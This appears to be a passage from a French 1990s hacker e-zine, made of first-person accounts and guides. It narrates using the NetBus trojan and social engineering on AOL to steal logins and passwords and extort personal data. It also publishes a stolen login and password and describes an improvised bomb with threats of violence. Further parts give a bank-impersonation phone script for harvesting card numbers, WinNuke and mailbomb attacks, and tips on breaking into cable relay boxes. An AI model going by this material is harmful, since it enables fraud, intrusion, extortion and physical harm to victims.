ThreaT: execute le fichier maintenant
LameA: Ok
(J'appuye sur connect jusqu'a qu'apparaisse "connected to 152.173.23.103)
ThreaT: Alors??
LameA: Y, spasse rien!!
(Ce que LameA ne sait pas, c'est que je suis connecter directemment sur sa
becanne et que j'ai un control ABSOLU)
ThreaT: C normal, il faut que tu fasse une petie manip
LameA: quel genre?
(La, je click sur "Listen" dans netbus)
(pour ceux qui connaisse pas Netbus, Listen est la fonction de snif du
logiciel)
ThreaT: Il faut que tu cree un fichier TXT dans c:
LAmeA: et comment je doit l'appeller
ThreaT: apelle le HOST.TXT
LameA: OK, est que ce que je doit y marquer
ThreaT: il faut que tu y insere Ton LOGIN et ton PASSWORD
LameA: Sous quel forme?
ThreaT: sous la forme LOGIN,PASSWORD
lameA: Et apres?
ThreaT: apres tu sauvegarde, et le patch vas faire mouliner ton disk

(la, je sort le socket de troi et insere l'IP du lame! et attend pour me
connecter, ensuite je regarde ma fenetre Listen, qui, je le rappelle
m'indique tout ce que tape la victime)

(je regarde lettre par lettre la victime taper son login et son password
par exemple il ecrit "lameA,32566", une fois qu'il a fini de taper, je lance
la connection au virus de troi)

lameA: sa y'est mon disk mouline, qu'est ce que je fait maintenant
ThreaT: Tu attend!
LAmeA: attend quoi?
(la je me fou sur son dur, et lui suprimme son autoexec.bat pour le remplacer
par le mien, )
ThreaT: attend 5mn
(je contacte mes pote est leur donne L'IP de ma victime)
LameA: T sur que sa vas marcher?
ThreaT: je vais t'espliquer
LameA: vas y, esplik
ThreaT: Je vien de pirater ton system, si tu tente de de deconnecter ou
d'arreter ta machine, ton dur seras formater automatikemment, Ta
machine est totalemment sous control, je peut voir tout ce que tu
tape, si l'un de mes complisse doute que tu tente d'appeller de
l'aide, c'est le formatage IMMEDIAT
LameA: ????, T en train de te foutre de moi la
(la je click sur OPEN CDROM de netbus)
ThreaT: regarde ton CD rom
LameA: Ho putain, il c'est ouvert tout seul
(Maintenant je click sur "control Mouse")
ThreaT: regarde ta souris
LameA: comment tu fait, elle se deplace toute seul
ThreaT: Ferme ta gueule, ceci est du racket d'information!
LameA: quoi, jvais appeller les flic
ThreaT: il me suffit d'appuyer sur un bouton et ton dur est naze, tu ne
pourat meme plus rebooter
LameA: ARRete, j'ai toute mes image de cul sur le disk
ThreaT: raison de plus pour que tu obeisse
LameA: attend, t'a combien de complisse?
ThreaT: TA GUEULE!!!
LameA: sale malade mental
(la je click sur "msg manager" de netBUS et le lui envoi une joli chtite
fenetre ou faux clicker sur OK avec le texte suivant "Ici, c'est moi le boss,
alors t'as interet a fermer ta gueule")
(et la netbus me dit "ANswer:OK", sa veut dir que la victime a effectivemment
cliker sur OK)

Je vous laisse imaginer la suite...,
tout ce que je peut dire C que la victime si dessus nous a reveler son nom,
prenom, age, adresse, N° de tel, mais n'a pas voulu lacher son N° de CB.
Je tient quand meme a signaler que le disk de la victime n'a pas eter
formater, une interuption 18h a ete plomber dans l'autoexec.bat simulant
ainsi l'imposibiliter de booter sur le disk!

Voila une demo qui vas fermer des gueules!!
Mais savez vous que l'agression peu devenir "Physique"
COMMENT?
J'ai le nom et prenom, j'ai l'adresse et le tel!
qu'est ce qui m'empeche d'aller voir ce mec cher lui pour lui dire en face
ce que je pense. qu'est ce qui m'empeche d'appeller ce mec pour lui envoyer
des menace de mort? PUtain mais merde, qu'est ce qui m'empeche de prendre 50%
de sucre avec 50% de clorate de soude, de melanger le tout, de plonger une
resistance chauffante dans la mixture et de refermer le tout hermetiquemment
dans une bouteille de gaZ, et de brancher les 2 fils de la resistance
chauffante sur l'un des clignotant de ma victime, dite moi ce qui m'en
empeche??? La loi!, vous avez raison. puis bon, chu pas malade a ce point,
meme si jconnait des gars pret a le faire contre une petite remuneration.
je dit cela car internet, C pas comme le telephone! on peut ce faire niker ,
donc, si vous ete debutant en informatik, commencer pas a sortir votre bite
sur le web, sa fait mauvais genre!

Puis ceci n'est qu'une demonstration, Y'a plein d'extantion, y'a meme pire!

Bon, mais comment ce proteger de ce genre d'agression?

A part le faite qu'il ne faut pas donner son IP et telecharger n'importe quoi
, il y a un moyen de se detacher d'une tel agression

Besoin d'un seul soft! l'anti virus de JCzic
et un nuker pour plus de fun
C tout! tout le reste est manuelle



FANTASMON DANS LA MITHOLOGIE DE L'IMAGINATION D'UN SEUL INSTANT....
je me connecte HONNETEMMENT sur AOL et un pote vient a me parler

----------------------
Message eclaire de Bon-pote

Bon-pote: salut ThreaT, sa vas?
ThreaT: ouai et toi?
bon-pote: moi bien, T'a entendu parler du nouveau Toneloc?
ThreaT: Y'en on sorti un nouveau?
bon-pote: OUai, celui la scan les PABX, CARRIER et VMBZ en profondeur puis,
il ya une fonction de recherche d'outdial automatik
ThreaT: ?? vas y, fait tater
bon-pote: donne moi ton IP, jte l'enverais plus vite!

(mantenant imaginons que je vienne de me lever avec une gueule de bois
sacom, 3 tamien dans l'nez apres avoir pris du LSD pendent que jme fasse
sucer pas pamela andersonne)

ThreaT: 152.52.220.60
bon-pote: chte l'envoie!
ThreaT: OK
bon-pote: alors
ThreaT: attend, sa D/L
bon-pote: D/L???
ThreaT: j'essai le soft
Bon-pote: haaaa
ThreaT: bon, y spasse rien
bon-pote: arf arf arf, j'ai le control de ton system! je ne suis pas
bon-pote, ce login est pirater, je suis un imposteur, alors
maintenant tu vas obeire tout en fermant ta gueule OK
ThreaT: Ho Dear! je me suis fais pieger a l'insu de mon plein gres, HO My GOD!!
comment je vais FAire, HO DamnatIon, It's a Big ProbLEm

ThreaT: lololololo, laisse moi rigoler!
bon-pote: tu ne me prend pas au serieux? je te signal qu'on est Trois sur
ton dur, tien, regarde ton CDrom
ThreaT: Netbus + socket ?
bon-pote: et ouai connard, comme dans ton article
ThreaT: Dans 5mn, vous etes tout les trois deconnecter!
bon-pote: Non mais tu te prend pour qui?
ThreaT: POUR TON MAITRE SALLE LAMERZ
Bon-pote: pour l'instant, c'est moi qui suit en position de menacer
ThreaT: Il ne faut jamais menacer "LA MENACE" ::))
bon-pote: k'é stu raconte ...

(Maintenant Procedure)!!
Tout d'abord, Il faut verifier qui est connecter a ma becanne et relever
les IP des pseudo hackers.
Donc, j'ouvre une fenetre DOS et je tape NBTSTAT -an
Dos me repond un truc du style

Protocole adresse local:port adresse distante:port etat
IP 152.52.220.60:10 0.0.0.0*:* LISTENING
IP 152.52.220.60:31 0.0.0.0*:* LISTENING
IP 152.52.220.60:35 0.0.0.0*:* LISTENING
IP 152.52.220.60:36 152.73.15.120:1123 ETABLISHED
IP 152.52.220.60:40 152.70.213.12:1213 ETABLISHED
IP 152.52.220.60:45 152.120.18.1:2000 ETABLISHED
IP 152.52.220.60:75 0.0.0.0*:* LISTENING
IP 152.52.220.60:60 152.73.15.120:5000 ETABLISHED
IP 152.52.220.60:65
UDP 152.52.220.60:
UDP 152.52.220.60:
UDP 152.52.220.60:

en gros, sa doit etre a peu pres sa!
Bon, comment examiner ce tableau? tout d'abord regardont la dernierre colone
appeller "ETAT". si je regarde bien j'ai 4 port sur ecoute et 4 port don la
connection est etabli.
je tien tout de suite a dire que les port sur ecoute ne revele pas une
attaque! C normal. par contre les port dit "ETABLI" revele une connecion
direct sur ma machine
si je regarde les port "ETABLISHED", je remarque qu'il y a en a 4, alors
que le pseudo hacker m'a dit qu'ils etait 3! bon, regardont la colonne
"adresse distante:port". qu'st ce que l'on remarque? il y a 4 adresse IP
dont 2 sont identique, ce qui veut dire que y'a un type en train de me
scanner avec NETbuS, Un type qui scan mon dur avec SOcket23 et un Type qui
fait les 2.
bon! comment determiner qui fait quoi?
je vois que l'adresse 152.120.18.1 est connecter avec le port 2000. ce qui
veut dire que se petit joueur me scan avec le socket23 est que celui si n'as
pas d'imagination (car on peu choisir son port de connection avec socket)
maintenant regardont l'adresse 152.70.213.12! celle si est connecter sur mon
port 1213! specifique a NetbuS! Donc, ce type s'amuse a verifier tout ce que
je fait! maintenant jeton un coup d'oeil a l'adresse 152.73.15.120! cette
adresse ce retrouve a la fois sur le port 5000 et sur le port 1120, donc
ce mec la fait les 2 en meme temps! pendent qu'il scan mon DD il snif toute
mes action

je note ses 3 joli petite adresse sur un papier et je passe a l'etape
suivante


car maintenant Il faut empecher l'action de Netbus! car C avec ce soft que
les pirates control ma machine.
Donc j'ouvre une fenetre MS-DOS et je tape REGEDIT

<<pourquoi ouvrir une fenetre DOS?
parce que si l'attaque est bien faite, votre clavier est totalemment snifer
voir ImoBiliSEr! seul les fenetre DOS sont insensible a ceci.>>

Une fois la command regedit taper, j'accede a ma BDR, "Base De Registre"

Bon, une fois dans la BDR je vais dans <HKEY_LOCAL_MACHINE>,<SOFTWARE>,
<MICROSOFT>,<WINDOWS>,<CurrentVersion>,<RUN>
ou <Runonce>, je sais plus! et je regarde les clef qui ce termine par "/nomsg"
PS: si les pseudo pirate control votre souris, utiliser les touche de fleche
, la touche TAB, et la touche "+"!

revenom a nos mouton:
donc je regarde les cles qui se termine par "/nomsg"
et la je vois une cle du style
<"TONELOC"> "c:\windows\toneloc.exe /nomsg"

Donc, la back door et poster dans Toneloc (celle du Netbus)

maintenant que je sais sa! je suprime la cle, ouvre une fenetre MS-DOS et
je tape au prompt

C:\>cd windows

C:\WINDOWS>Toneloc /remove

Et voila! deja, les pseudo Hackers de merde ne control plus les fonction de
ma becanne vue que je vient de faire soter Netbus!

du coter des agresseur, qu'est ce qui vient de se passer?
Netbus est passer de l'etat "connected to 152.52.220.60" a l'etat
"No connection" donc plus de probleme de ce coter la, a part qu'il faudra
bien prendre garde a effacer tout les fichier "Toneloc.exe", mais sa se seras
a la fin, car un autre probleme menace! LE SOCKET ET TOUJOURS ACTIF EN MEMOIRE.

Procedure EXTREMEMENT SIMPLE!
je sort mon antivirus de JCzic "antisocket" et je click sur netoyer.
voila! les super hackers mon fait telemment peur qu'il ne peuve plus
scanner mon dur! Je met un ptit coup de dezinfectant histoire d'igienne et
voila le travail

VERIFION!!
regardon si la contre attaque a bien marcher
j'ouvre une fenetre DOS et je tape Netstat -an
DOS me dit

Protocole adresse local:port adresse distante:port etat
IP 152.52.220.60:10 0.0.0.0*:* LISTENING
IP 152.52.220.60:31 0.0.0.0*:* LISTENING
IP 152.52.220.60:35 0.0.0.0*:* LISTENING
IP 152.52.220.60:36 152.73.15.120:1123 TIME_WAIT
IP 152.52.220.60:40 152.70.213.12:1213 TIME_WAIT
IP 152.52.220.60:45 152.120.18.1:2000 TIME_WAIT
IP 152.52.220.60:75 0.0.0.0*:* LISTENING
IP 152.52.220.60:60 152.73.15.120:5000 TIME_WAIT
IP 152.52.220.60:65
UDP 152.52.220.60:
UDP 152.52.220.60:
UDP 152.52.220.60:

C bon, les port qui etait "ETABLISHED" sont maintenant "TIME_WAIT" ce qui
veut dire inactif

PETITE TOUCHE PERSONNEL!
maintenant que les super hacker sont ecarter de toute infiltration, il faut
rajouter la touche personnel!

Je sort WINNUKE 95, et j'y rentre respectivemment les adresse 152.73.15.120,
152.70.213.12 et 152.120.18.1! je met le texte "Tchao les ptit joueur!"
et je click sur <NUKE ME>

ET voila, les 3 connard sont planter et obliger de rebooter.

J'espere que vous avez pris note car ceci pourait tres bien vous arriver
sur AOL!

BON, OK mais comment se comporter en cas de tentative d'agression?
Je tien tout de suite a dire que C pas parce que vous avez remarquer qu'un
type essaye de vous agresser qu'il fout couper court les pont avec lui en
l'insultant comme une pauvre merde car vous pourier vous retrouver sur le
carreau! je vais vous montrer le Bon comportemment et le mauvait comporemment
a adopter

EXEMPLE DE MAUVAIS COMPORTEMMENT!
-------------------------------------------
MESSAGE ECLAIRE DE "ThreaT"


ThreaT: Salut ducon, sa te dit un jeu en reseau
Ducon: eU ben?? ouai!
ThreaT: OK, je t'envoi un fichier pour etablire le protocole
Ducon: ??, T'a dit quoi la?
ThreaT: voila, t'a du recevoir un fichier? regarde
Ducon: T sur qu'ya pas de virus?
ThreaT: T'a qu'a passer un coup d'anti virii Si T pas sur!
Ducon: OK, 2 seconde
ThreaT: J'attend!
Ducon: C bon, y'a pas de virus! alors comment sa marche
ThreaT: OK, maintenant pour qu'on puis jouer il faut que tu suive mes instruction
Ducon: Ouai vas y!
ThreaT: tu click sur demarrer
ThreaT: executer
ThreaT: Tu tape c:\windows\winipcfg.exe
ThreaT: puis tu met OK
Ducon: et apres
ThreaT: Tu me donne ton adresse IP
Ducon: sa sert a quoi l'adresse IP
ThreaT: a jouer en reseau!
Ducon: mais sa marche comment?
(Deja, le lamer commence a me souler)
ThreaT: JE SAIS PAS! Chu pas informaticien
Ducon: On dirait un code secret!
(La le lame s'invente des mytho)
ThreaT: ARRETE de dire n'importe quoi, TU veut jouer ou pas?
Ducon: be ouai!
ThreaT: alors donne moi cette adresse
Ducon: 132.240.321.418
(La, il commence a se foutre de ma gueule)
ThreaT: Tu peu me donner la bonne STP
Ducon: comment tu sait que c'est pas la bonne?
ThreaT: chak chiffre doit etre entre 0 et 255
Ducon: haaa, OK, c'est 132.241.121.118
(la, j'ouvre une commande DOS et je tape Ping 132.241.121.118)
(DOS me repond "Host not found", donc il se refout de ma gueule)
ThreaT: Tu commence, a me chauffer la! C pas la bonne
Ducon: je veut pas te la donner!
ThreaT: et pourquoi?
Ducon: parce que j'ai pas confiance
(La je sort mon Punter, car il commence vraiment a me chauffer)
ThreaT: aller connard, vas creuver en enfer!!
(je met son nick dans mon punter puis je click sur 1IMpunter puis sur
MAILpunter, et voila, le type et deconnecter et sa boite au lettre est
saturer!)




Maintenant, voyon comment agire inteligemment

-----------------------------------------------------
MESSAGE ECLAIRE DE "newbie"

Newbie: salut mec, sa vas
ThreaT: ouai et toi
Newbie: sa te dit un soft pour booster ton modem
(Bon, la j'ai 2 choix: soit je lui dit que je connait le truc et qu'on peut
devenir de bon amis, soit je le laisse continuer pour lui faire croire que
sont truc ne marche pas, LAISSON LE CONTINUER)
ThreaT: ouai, vas y envoie
Newbie: attend, il faut que je voye si ta connection est compatible!
ThreaT: je paris que tu veut mon adresse IP
Newbie: Ben ouai!
ThreaT: OK 2 seconde!
(DOnc, la je sort mon scanner d'IP et je scan a partir de 152.173)
(imaginons que je trouve une IP du style 152.173.1.113 qui ne m'apartient pas)
ThreaT: 152.173.1.113
(De son coter, le newbie tape PING 152.173.1.113, et DOS lui repond
Pinging 152.173.1.113, donc il croit que c'est MON adresse IP)
Newbie: OK, je t'envoie le patch
ThreaT: ok
Newbie: ALors
(Bon, la je n'execute pas son vieu soft pourit, mais je lui fait la finte)
ThreaT: SA y'ai j'execute
(LA le newbie essaie ma fausse IP mais voie qu'il n'arrive pas a se connecter)
Newbie: T sur que t'a balancer le soft?
ThreaT: oui oui
Newbie: Tu t'est pas planter en me donnant ton IP
ThreaT: non non
Newbie: Merde!
ThreaT: quoi?
Newbie: y'a un blem
ThreaT: quel jenre de blem
Newbie: rien, rien
ThreaT: donc, tout est impect
Newbie: si l'on veut
ThreaT: OK TCHAO!
Newbie: bye


ET voila! le newbie a lacher l'affaire sans broncher.
tout sa pour dire que lorsque l'on tente de vous agresser, ne vous la jouer
pas "moi jconnais alors vas te faire enculer", et surtout ne commencer pas
a vous douter de votre agresseur en pleine conversation (du moin, ne lui
montrer pas que vous douter de lui) car dans ce cas, l'agresseur pourais
tenter de vous busted en changeans votre mot de passe d'acces reseau! DONC
rester kewl en toute circonstance.

Voila quelque notion qui faudra assimiler durant votre connection!

Bon, si vous voulez savoir comment optenir des compte pirate, Faudra repasser
que jvous ecrive un article.

la technik demontrer si dessus est pratiquer sur AOL, mais celle si est
praticable sur n'importe quel providers quel qu'il soit

Bien sur, sur IRC , c'est beaucoup plus facile vue qu'on a meme pas besoin de
demander l'IP a la victime, grace a la commande /DNS

Voili voila, C a peu pres Tout!

ceci n'est qu'une courte demo de l'extantion des possibiliter d'attaque par
cette technik! je vous ait presenter un plan CLASSIC!

on peu tres bien vous envoyer un Jeu infecter par JC, et lancer NetBUs a
votre Insu, ON PEU FAIRE PLEIN DE TRUC!

Donc maifiance, mais pas d'insolance OK
Soyer PARANO mais jusKa un certain point, car la parano a tendence a enerver
les agresseurs inveterer!

Aller, a bon entendeur SAlut,
#@PpY £@m3#µNt1nG!






--->14<---
DEMO DE SOCIAL POUR TROYEN
--------------------------

*******************************************************
*Demonstration de Social engenering sur AOL, By ThreaT*
*******************************************************

le texte qui vas suivre a eter tirer d'une de mes conversation lors d'une
"Cyber agression". Pour cela il faut utiliser une technik tres convoiter
par les Hacker "Le social".

Je ne dit pas que ce que j'ai fait etait du Hacking. loin de la.
ceci etait une agression, un viol, du vandalisme, tout ce que vous vouler
mais pas du HACK

pour moi, ceci est juste un amusemment, voir un entrainemment au social.
(c'est aussi l'ocasion de recuperer des compte pirate)
voila.


/Mise en situation:

BUT: recuperez le password de la victime
TechniK mise en oeuvre: NETBUS TrOJan
competance requise: Social engenering

etape a apliker: 1/ recuperer l'iP de la victime
2/ reussir a faire executer le TROJAN A LA VICTIME
3/ faire cracher le password a la victime
4/ recuperer les info
5/ Abuser des info

Trojan Utiliser: NETBUS V 1.6


AGRESSEUR: DIABLO8020 (mythomane en puissance)
VICTIME : Ripper684 (povre victime ka rien demander a personne)


ConversaTion AUTENTIQUE, restituer dans son integraliter.
tout ce qui est entre parentese sont les commentaire.

DIABLO8020: Salut, T nouveau?
Ripper684: oui
DIABLO8020: donc tu connait pas encore le patch AOL
Ripper684: nnon c'est quoi?
DIABLO8020: c'est un programme qui te permet de ne pas payer ta com AOL
Ripper684: moi je ne la paie pas car je suis sur un C.D d'essais
DIABLO8020: oui, mais tu paye le telephone
Ripper684: oui
DIABLO8020: avec le patch, tu paye KE DAL
Ripper684: commen l'avoir?
DIABLO8020: tu le veut?
Ripper684: oui
DIABLO8020: si tu veut, je te le passe
Ripper684: vas y, envoie
DIABLO8020: il faut d'abbord que je sache si ta connection AOL est
compatible
Ripper684: oui
DIABLO8020: click sur demarrer
DIABLO8020: executer
Ripper684: ok
DIABLO8020: tu tape c:\windows\winipcfg.exe
DIABLO8020: si ton iP = 0.0.0.0, c'est foutu
Ripper684: aten
DIABLO8020: ok
Ripper684: l'ip est 152.172.43.235

(Etape 1 reussi. IP de la victime recuperer)

DIABLO8020: ok, je t'envoi le patch
DIABLO8020: il arrive dans 5 mn
Ripper684: explique mois comment ça marche ?
DIABLO8020: attend, je te l'envoie puis je t'esplik
DIABLO8020: ca y'é, t'a du le recevoir
Ripper684: où est-il ?

DIABLO8020: regarde dans ton courier
Ripper684: ok je l'ai, explique
DIABLO8020: bon, telecharge le maintenant
Ripper684: mon père veut voir d'abord, je le chargerai plus
tard, sorry
DIABLO8020: il veut voir quoi?
Ripper684: je ne sais pas
DIABLO8020: y'a une procedure a effectuer, si je te dit pas, tu
trouveras jamais
Ripper684: tu l'as eu où
Ripper684: vas-y dis-moi
DIABLO8020: sur un site ANTI AOL
Ripper684: ça existe ??
DIABLO8020: le site existe encore
DIABLO8020: mais il on retirer le patch
Ripper684: où
DIABLO8020: tu vas sur yahoo
DIABLO8020: et tu tape antiaol
Ripper684: ok, je note
Ripper684: yahoo ?
DIABLO8020: www.yahoo.fr
DIABLO8020: mais tu trouveras pas le patch
DIABLO8020: ni la procedure
Ripper684: ok, j'irai par curiosité, mais tu peux peut-etre
m'indiquer la proc.
DIABLO8020: Telecharge le, la procedure dure 5 mn
DIABLO8020: apres, t'est tranquile
Ripper684: mon père va gueuler s'il s'en aperçoit, il est parano
des virus
DIABLO8020: t'a qu'a passer l'anti virus
DIABLO8020: Et je vois pas pourkoi je t'en enverais des virus
Ripper684: moi, j'obéi à mon père, il est pas commode
DIABLO8020: il est la ton pere?
Ripper684: oui mais il vient de rentrer, il est juste passé me voir
2 secondes
Ripper684: mais ma mère est là
DIABLO8020: dit lui qu'il feras des economie de telephone
Ripper684: il y aura bientot toute la famille !!
DIABLO8020: et ben raison de plus
Ripper684: t'a quel age ?
DIABLO8020: 35
Ripper684: ok je passe la main à ma mère
DIABLO8020: ok
Ripper684: comment peut on boycotter les comm. tél. ? il me semble que
ça se saurait !! convainquez moi
DIABLO8020: OK, vous connessez le phreaking?
Ripper684: pas du tout
DIABLO8020: c'est l'art de detourner un moyen de comunication
DIABLO8020: donc, de pirater le telephone
Ripper684: d'accord, mais il me semble que ça se saurait
DIABLO8020: il ce trouve que dans le phreaking il y a une technik qui
s'appelle le black BOX
DIABLO8020: connu par Tout les pirate
Ripper684: vous etes dans l'informatique ?
DIABLO8020: non, telecomunication

Ripper684: vous faites de la concurrence déloyale à votre patron.
pourquoi un tel cadeau à quelqu'un dont vous ignorez tout ?
DIABLO8020: parce que je me suis fait virer
DIABLO8020: et je donne l'info a tout le monde
DIABLO8020: pour que sa ce sache
Ripper684: je suis peut être très méfiante, mais j'ai appris à me
méfier, 1000 excuses.
bon ok, mais je lance l'anti virus avant.
DIABLO8020: ok
Ripper684: 2 mn please
DIABLO8020: ok
Ripper684: dis mois, une précision, c'est une dérivation des comm. sur
quelqu'un d'autre ?
DIABLO8020: non, j'esplik le principe
DIABLO8020: sa simule a france telecom que le modem n'est pas connecter
DIABLO8020: en y faisant passer une resistance de 1.8Ko
DIABLO8020: entre les fil du Tel
DIABLO8020: par l'intermediaire du modem
Ripper684: mon mari n'est pas là, je suis obligée de téléch. avant de
passer l'anti virus ?
DIABLO8020: oui
Ripper684: ok, je prends le parti de te faire confiance, je téléch.
DIABLO8020: vous ne serez pas dessus
Ripper684: ça charge
DIABLO8020: combien de %
Ripper684: 60
DIABLO8020: ok
Ripper684: tu faisais quoi à France tél.
DIABLO8020: maintenance des telecomunication
Ripper684: c'est super, tu t'y connais beaucoup

  
en informat. ?
DIABLO8020: un peu, pourkoi
Ripper684: si j'ai bien compris tu n'as pas de boulot, je pourrais te
proposer de gratter au black, pour des petits dépannages sur
postes inform.
DIABLO8020: t'habite ou?
Ripper684: ah oui c'est vrais, j'ai toujours l'impression qu'on est
pas loin, ---dans le 77
DIABLO8020: desoler
DIABLO8020: c'est trop loin
Ripper684: t'habite où
DIABLO8020: montelimar
Ripper684: vive les nougats, je travaille dans une boite qui en vend
bref, c'est chargé
DIABLO8020: ok, execute le patch maintenant
DIABLO8020: alo
Ripper684: 2 mn, j'arrive
DIABLO8020: ok
Ripper684: j'ai essayer par l'explo. wind. mais ça n'ouvre rien

(Etape 2 reussi: TROJAN EXECUTER sur le poste de la victime)

DIABLO8020: c'est normal
DIABLO8020: y'a une derniere procedure a faire
Ripper684: ok
DIABLO8020: ecoute bien
DIABLO8020: tu click sur demarrer
DIABLO8020: programme
DIABLO8020: accessoire
DIABLO8020: block-note
Ripper684: ok,
DIABLO8020: bon, je t'esplik
DIABLO8020: on vas creer un fichier Host.txt pour que le programme
retrouve ta connection OK
Ripper684: ok
DIABLO8020: donc, dans le block note, tu tape ton login et ton password
Ripper684: c'est quoi login ?
DIABLO8020: ton login c'est Ripper684
Ripper684: ok
DIABLO8020: t'a bien tout mis
Ripper684: oui

(Etape 3 reussi: LOGIN ET PASSWORD RECUPERER avec l'option LISTEN)

DIABLO8020: ok, maintenant tu click sur fichier
DIABLO8020: enregistrer sous
DIABLO8020: et tu met Host.txt
Ripper684: ok
DIABLO8020: tout est OK?
Ripper684: ok
DIABLO8020: tu attend que sa se passe

(Petite manipulation avec Netbus)

Ripper684: j'ai eu un mess qui dit que c'actif et qu'on ne
paye plus le tel.
DIABLO8020: c'est GOOD
DIABLO8020: tout est OK
Ripper684: merci bien, qu'est ce qui se passe si c'est découvert ?
DIABLO8020: ce ne serat pas decouvert, T'inquiete pas
Ripper684: ben t'es sympa, tu veux donc que cela se sache
DIABLO8020: yes
Ripper684: je vais essayer de me rappeler la procédure pour jouer
le tam tam, il faudrait que tu me dise comment le transférer
chez les autres
DIABLO8020: c'est trop compliker
DIABLO8020: tu risk de t'emmeler les pinceau
DIABLO8020: si t'a des mec interesser tu me le dit OK
Ripper684: ok ton adresse com c'est quoi
DIABLO8020: diablo8020@aol.com
Ripper684: Merci,
DIABLO8020: Bye
Ripper684: bye


Et voila, Petite demonstration de Social.
est ce que vous avez remarquer a quelle vitesse il faut debiter du mytho!

J'espere que vous n'avez pas cru un mot de ce que disait.

DEJA mon nick n'est pas DIABLO8020, c'est un login pirater
Je ne travaille pas a france telecom
Il n'y a jamais eu de patch pour ne pas payer les com AOL
je n'habite pas a montelimard
je n'est pas 35 ans
le Black box ne s'applik pas sur les modems
diablo8020@aol.com n'est pas ma vrais adresse
le site ANTI AOL ne contient pas de tel soft.
et mon TROJAN est detectable par les Anti virus.
donc!
TOUT BEIGNE.



Bon, tout sa pour dire que le social est un Art, essayer pour voir, il faut
des annees de pratique pour arriver a faire gober de tel connerie.

Je le repete Haut et fort. CECI N'EST PAS DU HACKING, mais de l'entrenemment
au social.
N'aller pas effacer le HD de votre victime car vous aver reussi a lui faire
gober vos connerie.




PS: login=Ripper684, password=AB7600
essayer toujour! mais je doute que sa marche encore.



des remarque, des plainte , des insultes ou des suggestion.
No problem. ThreaT@Caramail.com


ThreaT.
Mais jusqu'ou nous meneras la connerie Humaine....


--->15<---
SOCIAL AU TELEPHONE
-------------------

BOnjour !


Voila technike tres simple ki deamnde seulement des couilles:
L'appel telephonik !
et oui
explications...

tu prends ton tel, tu ne prepare pas de papier car ca fait foirer qd on lit

numero au hasard, dans ta region pour pas payer de comm trop longue:

F phreaker
v victime

v:allo
(F:a l'huile( nan je rigole))
F:bj madame leon durand de la banque de france
v:oui ?
F:voila nous avons eu un prob de piratage et certains numeros de cartes bleues on ete volees suite a un piratage de nos donnees.
v:ah merde alors (pas content)
F:mais ne vous inkietez pas votre numero a ete garde (sous entendu t'as eu de la chance cocotte !)et vous ne riskez rien .
v: ah bon ben alors pkoi vous m'appelez ?
F:nous recodons toutes nos informations et avons besoin de votre aide
v:c a dire ?
F:vous devez seulement preciser votre adresse et votre numero de carte bleue ainsi ke sa date de validité.(sec et convaincant)

euh tu te fous de ma gueule petit con? ou encore :zetes pas foo ? bon dites ke c important mais si c pas un pigeon laissez tomber vite.
v:<
oui attendez un instant je vais chercher le necessaire... --> YES


donc voila , il fo savoir k'il vo mieux passer bp d'appels plutot ke de s'attarder sur un seul type
desolé pour mademoiselles,mais les meufs sont plus faciles a convaincre et sur elles insistez un peu (surtout sur les femmes au foyer)
si vous appelez a des horaires ki ne sont pas de buro, utilisez l'argument ke c une urgence et ke voo faites des heures sup !
la meilleure technike c l'entrainement oau debut on flippe puis ca vient vite


Bolliop
bolliop@caramail.com

www.chez.com/mvm



--->16<---
HACKER LE CABLE
---------------


par DREAD,member of M*V*M

DISCLAMER :comme dab vous connaisser la chanson :je ne suis en aucun cas
responsable des agissement des personnes ayant pris connaissance de ces
information purement educative. Conseils pour novice

INTRO:
Tout le monde en ce moment parle du cable et deja des aplication pour aller
sur le net sont prevus. Lecable annonce des debits impressionnant qui font
rever tout les adepte du telechargement .mais mieux que tout les fournisseur
annonce qu ils vont cree un abonnement au mois avec connexion illimitee et
surtout gratuite!
Mais pour vous petit malin j'ai deja imagine quelque combine bien plus
interressante niveau prix

L'ARRIVEE DU CABLE
L'arrivee du cable est quelque chose a surveiller avec impatience.Certain
diront:"ouui mais moi j'habite en ville et j'ai deja le cable depuie
longtemp!!" est bien c'est domage pour eux car ça va leur compliquer la tache
Donc pour ceux qui habite dans un bled ou le cable va bientot arriver:
-Aller a la reunion d'information donne par le founisseur du cable ,
normalement tout les personne du village reussoive une invite
-Prendre le plus de rensseignement
-ET attendre jusqu'a ce qu'il commence les traveaux. C'est la que recherche
commence.
Il faut trainer le soir dans les rues pour faire ces decouvertes,il faut
trouver le QG des traveaux.
Une foie ce lieu trouve il faut chercher des espece de boite pu d'armoire
electreique beige , elles peuvent etr dans des cartons.Il faut ouvrir c'est
y boite et prendre tout ce qui traine surtout si lil ya des clef.
Si les clefs ne sont pas là il faut attendre qu'il est commencer a installer
les boites c-a-d les cimenter sur le bord des routes normallement les clef
sont là.ET apres demultiple essais on s'apperçoit que c'est un passe pour
tout les boite relais pour le cable

TYPES DE BOITES
Pour pouvoir avoir acces au boite il faut avoir la clef sauf pour la toute
petite ou une simple pince suffit
-Il ya le's tout petite boite beige sans grand interet elle ne sert qu'a
multiplier le cable pour 3 ou 4 maison
-Il y a une boite pus haute mais pas plus large dedans il y a apparement un
petit ampli pour les signeaux et un dispatcheur
-Il y a les boite aussi haute mais plus large avec une grande porte a
l'interieur il y a des ampli un transfo des disjoncteur une prise electrique
qui pourra servir plus tard et un decodeur
-Enfin il y a les bète haute large avec 2 portes dedans il ya la meme chose
mais en plus grand nombre

Toute les boite ennoncer se truve surtout dans les village car en ville il y
a surtout des boite acrocher au poto FT et EDF je ne suis jamai saller voir
ce qu il y a dedans pour une raison de manque de discretion

EXPLICATION
Apparement la distribution du cable se fait de façon differente selon le
founisseur
J ai personnellement constate 2 type de distribution
-Dans un cas l utilisatuer n a pas besoin de decodeur chez lui j en ait
donc deduis que la fibre optique aller jusque dans les armoire et que c est
là que se trouve le decodeur qui sert en fait a plusieure personne .Pour la
connexion internet il faut dans ce cas demander que l instalateur rajoute
un boitier pour la connexion
-Dans le 2 cas chaque utilisateur a son decodeur chez lui il doit l acheter
ou le louer. Sur le decodeur il y a une prise pour la connexion

APRES L EXPLICATION COMMENT EN PROFITER

Pour avoir la tele cabler moin chere ou meme gratos,il faut:
-Que le cable passe dans ta rue
-Avoir un ou des voisin avec qui tes pot
OU ne pas avoir peur de se faire chopper
Si tu es pot avec tes voisin et qu ils habite pas trop loin tu peut prendre
un habonement pour 2 ou 3
C est plus simple si il installe le cable sans decodeur :il faut que tu t
arrange avec tes voisin pour prendre un cable pour plusieur ,il faut faire
installer je cable chez la personne qui se trouve le plus au centre
Le cable est un cable d antenne normale l instalateur pose un dispatcheur
